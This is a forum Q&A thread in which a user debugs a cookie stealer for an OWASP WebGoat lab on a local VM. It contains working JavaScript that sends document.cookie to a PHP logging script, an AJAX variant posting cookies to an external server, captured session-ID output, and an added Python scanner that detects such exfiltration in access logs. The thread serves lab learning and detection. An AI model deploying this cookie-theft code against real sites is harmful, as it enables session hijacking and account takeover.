Solved

How to call a PHP script from Javascript in HTML

Posted on 2014-11-16
Last Modified: 2014-11-18
Hello experts,
 
I'm trying to construct a basic cookie stealer.  I have Javascript in an HTML doc that calls a PHP file and passes it the value of the session cookie.  Now, I'm able to run the PHP file by itself and it creates the specified file, but when I open the basic HTML doc I only see the text of the PHP file in the browser window, and no text file is written in the PHP dir.  I've been scratching my head for a few hours this morning and am not sure what I'm doing wrong.  I've tried both var assignment and properties such as document.location in the HTML file:

HTML doc:
<script language="Javascript">
 document.location = "http://localhost:8080/WebGoat/cookiestealer.php?cookie=" + escape(document.cookie);
</script>

cookiestealer.php:
<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>

This is probably something silly I'm overlooking.  Any ideas?

Question by: dilligent

Expert Comment by Ray Paseur (ID: 40445772)
We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!

Author Comment by dilligent (ID: 40445777)
This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.

Expert Comment by Ray Paseur (ID: 40445784)
For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:
<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;

And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>

Expert Comment by Ray Paseur (ID: 40445785)
Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.

Expert Comment by Ray Paseur (ID: 40445789)
This worked for the front-end script and it echoed the appropriate data:
<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>

Output:
Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}

I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.

Author Comment by dilligent (ID: 40445846)
I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headers
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parameters
cookie:**********************
Response Headers
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1
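The request above is exactly what a cookie exfiltration looks like from the server's side: a session cookie riding in a query string. As an added example (not part of this thread), the following Python scans constructed combined-format access-log lines and flags any query parameter whose URL-decoded value has the `name=value; name=value` shape of `document.cookie` or names a known session cookie; the log lines, IP addresses and cookie values are all constructed.

```python
"""Flag access-log requests whose query string carries a browser cookie string.
Added example for the defensive side of the thread; log lines and cookie values are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/Tomcat "combined" format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Session-cookie names that should never appear as a query-string value,
# and the "name=value; name=value" shape of document.cookie after URL decoding.
SESSION_NAMES = ("PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "sessionid")
COOKIE_SHAPE = re.compile(r'^[\w.-]+=[^;=\s]+(;\s*[\w.-]+=[^;=\s]+)+$')

def looks_like_cookie(value):
    """True if a decoded parameter value is a cookie string or a session id."""
    v = value.strip()
    return bool(COOKIE_SHAPE.match(v)) or any(v.startswith(n + "=") for n in SESSION_NAMES)

def suspicious_params(target):
    """Return (param, decoded value) pairs in a request target that carry cookies."""
    query = urlsplit(target).query  # parse_qsl also undoes the escape()/%XX encoding
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if looks_like_cookie(v)]

def scan_log(lines):
    """Return (client ip, path, param, value) for every suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = urlsplit(m["target"]).path
        for param, value in suspicious_params(m["target"]):
            findings.append((m["ip"], path, param, value))
    return findings

# Constructed sample lines: the cookiestealer.php pattern from the thread,
# a benign WebGoat lesson request, and a tracking-pixel style exfiltration.
SAMPLE_LOG = [
    '127.0.0.1 - - [16/Nov/2014:10:59:50 -0600] "GET /WebGoat/cookiestealer.php'
    '?cookie=lang%3Dde%3B%20PHPSESSID%3Ddeadbeef00112233 HTTP/1.1" 200 174',
    '127.0.0.1 - - [16/Nov/2014:10:59:51 -0600] "GET /WebGoat/attack?Screen=32&menu=900 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [16/Nov/2014:11:02:13 -0600] "GET /img/t.gif?c=JSESSIONID%3DFD2AF79120765259 HTTP/1.1" 200 43',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Run against the sample it reports the cookiestealer.php and tracking-pixel requests and ignores the lesson request; point `scan_log` at real log lines to reuse the same check.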

Expert Comment by Dave Baldwin (ID: 40445904)
You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.

Author Comment by dilligent (ID: 40446024)
Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal response back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>

Expert Comment by Dave Baldwin (ID: 40446193)
I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.

Author Comment by dilligent (ID: 40446223)
Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.

Accepted Solution by Dave Baldwin (earned 500 total points; ID: 40446279)
Standard Apache installs have some extra code that tells them when to run PHP code thru the PHP interpreter, it is not automatic.  If PHP is already installed on the server, it's the part that tells the web server to use the PHP interpreter to run the PHP code that you need.

Author Closing Comment by dilligent (ID: 40449925)
Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.

Expert Comment by Dave Baldwin (ID: 40450659)
You're welcome.